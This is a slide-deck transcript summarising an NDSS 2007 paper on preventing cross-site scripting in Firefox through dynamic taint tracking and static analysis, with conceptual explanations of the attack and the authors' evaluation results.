By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni...
-
Upload
agnes-shelton -
Category
Documents
-
view
216 -
download
0
Transcript of By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni...
Cross-Site Scripting Prevention with Dynamic Tainting and Static Analy-sis
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic,Engin Kirda, Christopher Kruegel, and Giovanni VignaNetwork and Distributed System Security(NDSS ‘07)
1 / 18
Authors
Philipp Vogt Main developer of the XSS
Attack Prevention in Firefox project
Cross site scripting detec-tion
Giovanni Vigna Associate Professor of UCSB Web Security, Intrusion De-
tection2 / 18
Introduction[1/5]
Cross Site Scripting An attack against web applications
where malicious scripting code is in-jected into the output of an application that is further delivered to a user’s web browser
This scripting code transfers sensitive in-formation to the attacker
This information allows the attacker to impersonate the victim or hijack the vic-tim’s session
3 / 18
Introduction[2/5]
Cross Site Scripting
Attacker
Server
Victim
Send to email with XSS code
Send to request with XSS Code
Send to response with XSS Code
XSS Code is executed
Sensitive information is trasfered
4 / 18
Introduction[3/5]
Stored XSS Attacker persistently stores the malicious code in a resource managed by the web application, such as a database. when the victim requests a dynamic page, The actual attack is carried out at a later time.
Reflected XSS The attack script is not persistently stored, instead, it is reflected(sent back) to the victim. Example
Sending to the victim an email with a link that contains the malicious JavaScript code.
5 / 18
Introduction[4/5]
Sensitive Data Sources
6 / 18
Introduction[5/5]
The Goal JavaScript program can send sensitive in-formation only to the site from which it was loaded So the information flow of sensitive data is tracked inside the JavaScript engine of the browser. Whenever an attack is detected, the user is warned and given the possibility to stop the trans-fer.
7 / 18
Dynamic Tainting[1/5]
Dynamic Tainting Sensitive data is first marked, and then, when this data is accessed by scripts run-ning in the web browser, its use is dynami-cally tracked by system. it is sufficient to model the taint value associ-ated with a piece of data as a simple boolean flag.
8 / 18
Dynamic Tainting[2/5]
Taint Propagation Assignments Arithmetic and logic operations (+, -, &, etc.) Control structures and loops (if, while, switch,
for in) Function call and eval
9 / 18
Static Tainting[1/3]
Indirect Control Dependency
To cover both direct and indirect control dependen-cies, all possible program path in a scope need to be examined.Static analysis is necessary.
10 / 18
Static Tainting[2/3]
Linear Static Taint AnalysisEnsure all variables that are assigned val-ues (tainted or not) inside the tainted scope are also tainted.
11 / 18
Static Tainting[3/3]
Stack Analysis
Instructions responsible for setting object properties do not specify the target object because of stack-based nature of JavaScript.
Abstraction stack which has boolean values.
12 / 18
Data Transmission
The tainted data has to be trans-ferred to a third party, using a variety of meth-ods. document.location. source of an image in the web page. Submitting a form in the web page. XMLHttpRequest object.
13 / 18
Evaluation[1/4]
XSS attacks XSS sources that group’s members collected Successful in detecting XSS
Manual test The modified browser was used by the au-
thors for web surfing on a daily basis The overhead of is negligible. The amount of false positives was low.
14 / 18
Evaluation[2/4]
Automatic test Integrate a web crawling engine into modi-
fied Firefox. Visited 1,033,000 unique web pages 88,589 (8.58%) web pages raised an XSS
warning The scripts are inserted into the web page
with the consent of the web site owner.
15 / 18
Evaluation[3/4]
Top -30 destination domain These domains belong to
companies that collectstatistics about traffic on web sites of their customers
Deny top 30 domains, reduce to 13,964(1.35%)
Reduced to 5,289 (0.51%) if only transfer of cookies were considered
16 / 18
Evaluation[4/4]
Reasons of small false positives Transfer of cookies to different domains,
but within company borders (eg. cnn.net -> cnn.com)
Transfer of cookies between different domains, but same company (eg. dis-cover.com -> unitedstreaming.com)
Our indirect control flow
17 / 18
Conclusion
Prevent XSS attacks using a dynamic taint analysis and static analysis when neces-sary.
Integrate the solution into Firefox web browser by modifying its JavaScript en-gine.
Generate small false positives and feasible in practice.
18 / 18
19
Extra - Dynamic Tainting[3/5]
Assignments If the right-hand side of the assignment is tainted,
then the target on the left-hand side is also tainted. x = document.cookie;
The variable that is assigned a tainted value is not the only object that must be tainted.
Arithmetic and Logic Operation Javascript is a stack-based language. First pop the operands from the stack and then push back
the result. The result is tainted if one of the used operands is
tainted.
20
Extra - Dynamic Tainting[4/5]
Control Structures and Loops if the condition of a control structure tests a tainted value, a tainted scope is generated that covers the whole control structures. A variable is dynamically tainted only when its value is modi-fied inside a scope during the actual execution of the program
Function Calls If a function is defined in a tainted scope, the function itself (op-erations, parameters, return value) is also tainted
Eval If eval is called in a tainted scope or if its parameter is tainted, a scope is generated.
21
Extra - Dynamic Tainting[5/5]
Example
22
Extra - Implementation
Extends Mozilla firefox 1.o pre Two parts for containing tainted data objects
The javascript engine (Spider-Monkey) Variable, functions, scopes, and objects
DOM tree location.href, etc
Every time a JavaScript program attempts to transfer sensitive data, a check is performed to determine whether sensitive data is sent to own host